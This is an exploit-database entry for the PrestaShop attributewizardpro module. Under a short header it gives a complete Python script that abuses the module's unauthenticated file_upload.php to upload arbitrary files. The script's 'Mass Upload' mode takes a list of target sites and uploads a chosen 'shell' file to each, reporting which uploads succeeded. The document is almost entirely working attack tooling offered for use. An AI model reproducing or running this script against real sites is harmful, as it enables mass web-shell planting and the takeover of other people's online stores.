Prestashop Attributewizardpro Module Arbitrary File Upload Exploit
| EKU-ID: 5800 | CVE: | OSVDB-ID: |
| Author: PentesterDesk | Published: 2016-08-29 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 5800 | CVE: | OSVDB-ID: |
| Author: PentesterDesk | Published: 2016-08-29 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
#!/usr/bin/python #################################################################################### #Author : PentesterDesk #Date : 29-June-2016 #Software: Prestashop CMS #vuln Mod: attributewizardpro #################################################################################### import sys, os import requests def main(): os.system('cls' and 'color -a' if os.name == "nt" else 'clear') banner = ''' +======================================================+ | Prestashop | FileUpload Exp | PentesterDesk | | Coded by : PentesterDesk Team | | Contact : pentesterdesk@gmail.com | +======================================================+ ''' print banner #/modules/attributewizardpro/ os.system('cls' and 'color -a' if os.name == "nt" else 'clear') print banner print "\n <============[[Attributewizardpro Exploit]]============>\n" print "[1] Single Site " print "[2] Mass Upload" ch=raw_input("\n[>] ") if ch == '1': os.system('cls' and 'color -a' if os.name == "nt" else 'clear') print banner print "\n <============[[Attributewizardpro Exploit]]============>\n" url = raw_input("[+] Enter Url : ") filname= raw_input("[+] Enter File : ") if filname == '' or url == '': print "\n[!] Url or File is not entered\n" raw_input("[+] Press Enter [>] ") main() url = url + "/modules/attributewizardpro/file_upload.php"#main files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')} req=requests.post(url,files=files) final =[] final = (req.text).split("||||") if req.status_code == 200 and filname in req.text: url=url.replace('/file_upload.php','/file_uploads/'+final[0]) print ("[+] %s [ok]" % (url)) else: print "\n[+] %s [no]\n" %url raw_input("\n[+] Press Enter [>] ") #mass if ch == '2': os.system('cls' and 'color -a' if os.name == "nt" else 'clear') print banner print "\n <============[[Attributewizardpro Exploit]]============>\n" filee = raw_input("[+] Enter List Name : ") filname= raw_input("[+] Enter Shell Name : ") if filname == '' or filee == '': print "\n[!] Url or File is not entered\n" raw_input("[+] Press Enter [>] ") main() ob = open(filee,'r') lists = ob.readlines() list1 = [] i = 0 for i in range(len(lists)): list1.append(lists[i].strip('\n')) count = 0 for site in (list1): count = count + 1 url = site + "/modules/attributewizardpro/file_upload.php" files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')} req=requests.post(url,files=files) final =[] final = (req.text).split("||||") if req.status_code == 200 and filname in req.text: url=url.replace('/file_upload.php','/file_uploads/'+final[0]) print ("[%d] %s [ ok ]" % (count,url)) else: print ("[%d] %s [ No ]" % (count,url)) if __name__ == "__main__": main()